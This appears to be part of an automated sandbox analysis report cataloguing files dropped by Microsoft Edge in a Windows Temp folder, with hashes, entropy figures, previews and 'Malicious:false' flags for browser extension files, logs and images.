                                                                                                                                                                                                                                                                                                      SHA-512:3AB18E5DE48AD1AFF696855A7925D32F2E3FA3682F9CD421D7337CAA9B35C9F3070B75C20711BE9E016959FA8ED17176CC3FCCF5AF8BB2304EDC57FBF37B4B82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:E.P.u.SS....I..E..u.P...Q0.E..U.RP...Q...xi.E..U.RP...QP..xX.E.M.Qh....P...R...x9.u..M.......u...<.I....H..D9.8\9.t..@8.X..D9.8\9.t..@8.X..E.P...Q..E.P...Q.....h..........VP.K....E.....U.E........E..E.E.E..].3.U..U.P.U..E.;GG..].....I.....t>.M.......P.L.........PV....I.V..<.I.f9.....t:.M.......P......)...H..D9.8\9.t..@8.@......D9.8\9.t..@8.X..}.._^[t..u...<.I...t.I..M..i5..3.....U.....$......S.].VW.L$.3..C.!|$..|$..p....Z....{...F..D$......0r..C..H...A.....u.....2.....\$...f.........T$......+u.3...B.....-u....3.........Rtg..rtb..AtY..atT..StK..stF..Ht<..ht7..Nt+..nt&..Ot...ot...Tt...t..u........................j.X..j...j ..3.@...u....|$....D$.........f....M....E..@..0...Y....N..T$ ...D$ .A..D$$.A..D$(.A...D$,........$0...P.D$4P..$8...P..$<...P.t$0.;O.......$0...P..$4...P.......$8...P.D$<P..........$0...Ph......$.I..=..I...$0...P...tR.L$0.]Z.....tD.L$0.`...........D$0P....I..L$..t$.....#.P.D$4P....I...uH..$0...P..u....8\...F......&..L$ ..3.._^3.[..]....u.....\...&..F....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\a5296c0b-3e7b-429a-8db3-5ae9a629c3f8.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):31335
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                      MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                      SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                      SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                      SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\a540b9da-2daf-410e-aa60-2f22ceb65ff5.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.408481134189486
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0HkyT5sM08K5M:JIVuwEw5MUFZLBQLtgl+M
                                                                                                                                                                                                                                                                                                      MD5:742601D05D27877BB260DF3D6A3F9CBE
                                                                                                                                                                                                                                                                                                      SHA1:9171E7F7F706BC367AD3FA792FF1334E8E9BDE5E
                                                                                                                                                                                                                                                                                                      SHA-256:092A3B0734EC40A59AE947A095EB0BC38CF4AAAB98D3DD83CB752C21870EFAAD
                                                                                                                                                                                                                                                                                                      SHA-512:60E28CFB95252D3BD912FC143433A3A825DD747397150AF3BB320F867ABADDB8775B47B022235DF4C0289540A3E8198A9A5F5277492EF7D8FB7033C187E33DCB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\e69e760c-2df5-4b0e-b362-34217efbffcc.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_1318186418\3d0113f4-ce94-4bc0-83b4-3ac78631ca65.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_1318186418\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_1318186418\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_1318186418\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_1318186418\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir3084_159575964\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
